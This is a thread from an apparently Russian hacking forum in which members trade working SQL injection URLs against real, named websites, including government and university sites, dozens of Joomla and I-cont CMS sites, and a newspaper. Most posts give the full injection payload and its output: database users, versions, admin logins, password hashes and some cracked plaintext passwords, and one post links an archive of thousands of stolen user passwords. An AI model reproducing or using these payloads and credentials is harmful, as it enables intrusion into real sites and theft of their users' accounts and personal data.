SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    http://www.deco10.com/index.php?inc=lis&cat_id=-999+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables+limit+1,1/*
     
  2. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    Можно, если основной запрос идет запрос на обновление update, или на вставку insert. Обьединять можно только запросы одного типа, разных - нет.
     
  3. WhatUw81N4

    WhatUw81N4 New Member

    Joined:
    16 Jan 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Администрация Форума!

    Ольга : qween1
     
  4. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    update и в insert, select прокатывает
     
  5. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,019
    Likes Received:
    770
    Reputations:
    97
    frugalreader.com что-то типа обменника книг для частников (SQL-inj + БД)

    SQL-inj:
    Code:
    http://www.frugalreader.com/books.php?searchMethod=basic_search&subject_id=-1+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,nickname,password,email),8,9+FROM+user/*&doSearch=1&searchSubject=1&showBooks=1&title=&author=&isbn=
    БД (расшифровано 4185 из 4613 (почти 91%)) паролей:

    http://dinar007.by.ru/hbd/base_frugalreader.zip
    Пароль к архиву: antichat.ru
     
  6. sedoy_xxx

    sedoy_xxx Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    244
    Likes Received:
    41
    Reputations:
    -1
    www.lrn.ru
    Code:
    http://www.lrn.ru/index.php?module=library&action=subgroup&subgroupid=-14+union+select+concat_ws(0x3a,user(),database(),version()),2/*
    lrn_ru@localhost:lrn_ru:5.0.46-log/2 (file_priv нет)
    Code:
    http://www.lrn.ru/index.php?module=library&action=subgroup&subgroupid=-14+union+select+concat_ws(0x3a,username,password),2+from+users+where+username+like+%22Vitls%22/*
    установочный путь: /var/www/vhosts/lrn.ru/htdocs/lrnphplib/doclib.php
    админка: http://www.lrn.ru/admin (как через нее залить шелл я не догнал)
    Vitls:gjhextybt
     
    1 person likes this.
  7. WuWu

    WuWu Banned

    Joined:
    16 Dec 2007
    Messages:
    20
    Likes Received:
    23
    Reputations:
    -5
    HTML:
    http://alterego.tut.by/downloads/index.php?action=category&id=10'+union+select+1,concat_ws(0x3a,user(),database()),3,4,5,6,7/*
    [email protected]:alteregotutby
     
  8. WuWu

    WuWu Banned

    Joined:
    16 Dec 2007
    Messages:
    20
    Likes Received:
    23
    Reputations:
    -5
    HTML:
    http://www.climatelab.ru/index.php?action=pages&id=4+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7/*
    5.0.24a
    climatea_climat@localhost
    climatea_climat


    усть доступ к schema , но я несмог найти админа
     
    4 people like this.
  9. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    channelg.tv
    HTML:
    http://www.channelg.tv/project.php?focus_id=999999+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3/*&page_id=54
    channelg@localhost:4.0.24:channelg
    Там CMS какая-то...
    uginfo.sfedu.ru
    HTML:
    http://uginfo.sfedu.ru/news/news.php?newsId=-1194414947+union+select+null,null,null,null,null,null/**/
    sgcs.fcm.unc.edu.ar
    HTML:
    http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+USER/**/
    HTML:
    http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+version()/**/
    user - postgres
    version() - PostgreSQL 8.1.10 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.0.gcc-opt (GCC) 4.0.3 (Ubuntu 4.0.3-1ubuntu5)
    HTML:
    http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES/**/
    - названия таблиц
    HTML:
    http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA.COLUMNS/**/
    - названия колонок
     
    2 people like this.
  10. BizzyD

    BizzyD Elder - Старейшина

    Joined:
    2 Jun 2007
    Messages:
    209
    Likes Received:
    118
    Reputations:
    0
    Code:
    http://www.netlink.ru/index.php?action=pages&id=99999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4/*
    netlink_netltbn@localhost:netlink_netltbn:5.0.24a

    Code:
    http://www.homeopath.ru/index.php?action=pages&id=99999+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7/*
    homelogin@localhost:homeopath:4.1.22
     
    #4530 BizzyD, 17 Jan 2008
    Last edited: 17 Jan 2008
    2 people like this.
  11. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    сессия съела мой мозг :\
    ---

    http://www.chatman.ru/index.php?show=search&id=-1'+union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9/*

    4.1.22-standard/chatman_chatman/chatman_u51279@localhost
    -----------------------------------------------------------------------------

    http://mmp.cs.msu.su/index.php?pid=dirlist&id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10/*

    4.1.21/mmp/mmp@localhost


    http://mmp.cs.msu.su/index.php?pid=dirlist&id=-1+union+select+1,concat_ws(0x2F,login,password),3,4,5,6,7,8,9,10+from+users/*

    логин/пароль
    admin/mrkroz2909

    --------------------------------------------------------------------------

    А это аццкие специалисты сетевых технологий угрожают гнусным хакерам :D

    http://misteria.koptevo.net/modules.php?name=Mediacatalog&pa=showMediacatalog&pid=-1+union+select+1/*
     
    4 people like this.
  12. Momiji

    Momiji Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    495
    Likes Received:
    348
    Reputations:
    127
    http://www.peekvid.com
    Code:
    http://www.peekvid.com/showcategorypage.php?id=34'+union+select+concat_ws(0x3,version(),user(),database())/*

    5.0.22root@kentuckyprivpeekvid_v2

    Code:
    http://www.peekvid.com/showcategorypage.php?id=34'+union+select+concat_ws(0x3,user,password)+from+mysql.user/*
    Root67ef27e02618b87a:ZAQxsw
     
    2 people like this.
  13. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.hdds.spb.ru/news/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user())

    5.0.51/hdds/hdds@localhost


    http://www.hdds.spb.ru/news/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,username,password,email,icq)+from+forums_auth+limit+0,1

    логин/хеш/мейл/асику
    Cavaler/50cc3872ca61179a359e6263a3fd3d43/[email protected]/48555995
     
    1 person likes this.
  14. presidentua

    presidentua милиционер Античата

    Joined:
    4 Nov 2007
    Messages:
    305
    Likes Received:
    236
    Reputations:
    15
    газета Труд кому то надо?
    ну тогда держите -
    Code:
    http://www.trud.ru/issue/shortnews.php?id=-64066+union+select+1,2,user(),version(),5,6,7/*
    trudinfo@localhost
    4.1.21-log
     
    2 people like this.
  15. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    MSSQL
    _http://www.treasury.gov.au/content/tax_treaties.asp?ContentID=759'
    _http://www.nsw.gov.au/Business_results.asp?SEARCH_KEYS='OPER_LCYCLE_BUSINESS_SNSW&DISPLAY1=Business+Life+Cycle&DISPLAY2=Operating+a+Business
    _http://www.montgomerycountymd.gov/csltmpl.asp?url='/content/council/index.asp
    _http://web.nsc.gov.tw/default.asp?mp=7'
    _http://www.pme.gov.sa/warnning/file.asp?ID=68'
    _http://www.izkor.gov.il/izkor86.asp?t=0'&dir=0&i=0&pab=4332&nab=91086&pdt=8318&ndt=9

    MySQL
    _http://www.wiredforhealth.gov.uk/cat.php?catid=842'
    _http://www.monitor-nhsft.gov.uk/publications.php?cat=8'
    _http://www.cszx.gov.cn/art/catb.php?catid=1'
    _http://www.yarriambiack.vic.gov.au/council_services/sub_menu.php?subMenuId=119&menuId=27'
    _http://www.tcvn.gov.vn/en/index.php?p=cat&cid=35'

    _http://porx.rambler.ru/porx/viewprofile.php?user=%D0%B4%D0%BE%D0%BB'
    _http://hotel.travel.rambler.ru/vitrina.asp?sDescr=1390'
     
    #4535 ReVOLVeR, 18 Jan 2008
    Last edited: 18 Jan 2008
    1 person likes this.
  16. .nor

    .nor Elder - Старейшина

    Joined:
    29 Jun 2007
    Messages:
    50
    Likes Received:
    7
    Reputations:
    0
    Code:
    http://info.l2r.ru/?part=items&id=(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20(%22henna%22,%22drops_5%22))--
    таблицы - henna и drops_5 дальше подобрать не смог ибо запятые жестоко фильтруются.
    Пробовал различные методы в т.ч 0x2c , сhar'ы и тд. кто найдёт замену этой запятой плз скиньте инфу сюда или в личку)
     
    #4536 .nor, 18 Jan 2008
    Last edited: 19 Jan 2008
  17. ХаЬа

    ХаЬа Banned

    Joined:
    18 Jan 2008
    Messages:
    6
    Likes Received:
    7
    Reputations:
    0
    Code:
    http://www.freegaming.de/index.php?option=com_puarcade&Itemid=92&fid=-1+union+select+concat(username,0x3a,password)+from+jos_users/*
    
    
     
    3 people like this.
  18. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Code:
    http://adeptweb.info/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
    http://www.budshop.com.ua/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
    http://kadrovest.ru/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
    http://hostofmine.net/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
    http://www.akademikerzeitung.ch/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
    http://www.jerseyrecruitment.com/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
    http://www.identitytextiles.com/2007/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
    http://tryanotherangle.com/joomla/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
    http://www.ilm-media.at/portal/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
    http://www.worldfashioncouncil.org/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
    http://www.sagentpharma.com/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
    http://www.rh-communication.ch/cms/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
    http://www.kinayperde.com/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
    http://www.innoventions.co.za/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
    http://chinstudent.org/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*
    http://www.zeros2heroes.com/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*
    http://www.jovita.lt/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*
    http://www.stopthetraffik.nl/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*
    http://www.circusfrog.com/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*
    http://portalul.eu/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*
    
     
    4 people like this.
  19. none222

    none222 Guest

    Reputations:
    0
    sql-inj
     
    3 people like this.
  20. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    CMS I-cont

    _________________________________

    http://www.maybach-manufaktur.ru/news/?id=-9+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+maybach_users/*

    http://www.emspost.ru/en/news/archive/?id=-498+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+ems_users+limit+2,1/*

    http://serpentor.ru/news/?id=-368+union+select+1,concat(login,0x3a,pwd),3,4,5,6,7,8+from+serpentor_users+limit+1,1/*

    http://trinity-cis.com/en/news/?id=-12+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10,11,12+from+trinity_users/*

    http://www.marcor.ru/news/?id=-21+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+marcor_users/*

    http://www.relod.ru/news/?id=-109+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10,11+from+relod_users/*

    http://www.itclinic.ru/press_center/news/?id=-2+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10+from+itclinic_users/*

    http://www.rochet.ru/news/?id=-379+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+rochet_users/*

    http://www.gluon.ru/news/?id=-375+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+gluon_users/*

    http://www.schnittke-mgim.ru/news/?id=-26+union+select+1,2,3,4,5,concat(login,0x3a,pwd),7,8,9,10+from+shnitke_users/*

    http://www.eurotemp.ru/news/?id=-16+union+select+1,2,concat(login,0x3a,pwd),4,5+from+eurotemp_users/*

    http://www.samaya-samaya.ru/company/news/?id=-22+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10,11+from+sam_users/*

    http://www.mostd.ru/news/?id=-1+union+select+concat(login,0x3a,pwd),2,3,4,5+from+mostd_users/*

    http://ikrs.ru/news/?id=-371+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+ikrs_users/*

    http://www.1tort.ru/news/?id=-366+union+select+1,2,3,4,5,concat(login,0x3a,pwd),7,8,9,10+from+1tort_users/*

    http://neftebor.ru/news/?id=-17+union+select+1,2,3,concat(login,0x3a,pwd),5,6,7,8,9+from+neftebor_users/*

    http://www.harmline.ru/news/?id=-371+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+harmony_users/*

    http://www.eko-sad.ru/news/?id=-395+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+ecosad_users/*

    http://www.panoramakino.ru/news/?id=-374+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+panorama_users/*

    http://www.hotelpearl.ru/news/?id=-13+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+hotelpearl_users/*

    http://www.mp218.ru/articles/news/?id=-8+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+mp218_users/*

    http://digitec.ru/news/?id=-8+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+digitec_users/*

    http://www.japanplast.ru/news/?id=-7+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+japanplast_users/*

    http://www.angic.ru/news/?id=-5+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+angic_users/*

    http://dvector.ru/news/?id=-2+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10+from+dvector_users/*

    http://www.lucsor.ru/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+lucsor_users/*

    http://www.nstkani.ru/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10+from+nika_users/*

    http://omnia-insurance.com/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+omnia_users/*

    http://www.leon-beton.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+leon_users/*

    http://www.zalogu.net/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+zalogu_users/*

    http://www.adanilov.ru/news/?id=-1+union+select+1,2,3,4,5,6,concat(login,0x3a,pwd),8,9,10,11+from+danilov_users/*

    http://www.melodytour.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+melody_users/*

    http://www.abarysheva.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+barysheva_users/*

    http://www.torshin.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+torshin_users/*

    _________________________________

    виновник этого безобразия :D :

    http://www.i-market.ru/news/?id=-434+union+select+1,2,3,4,5,concat(login,0x3a,pwd),7,8,9,10+from+imarket_users/*

    _________________________________


    админки находятся по адресу

    http://site.ru/adm

    хеш паролей простой md5

    _________________________________

    p.s взломано при помощи телефона nokia N70,браузера Opera-mini(mod) и... не совсем кривых рук :)
     
    11 people like this.
Thread Status:
Not open for further replies.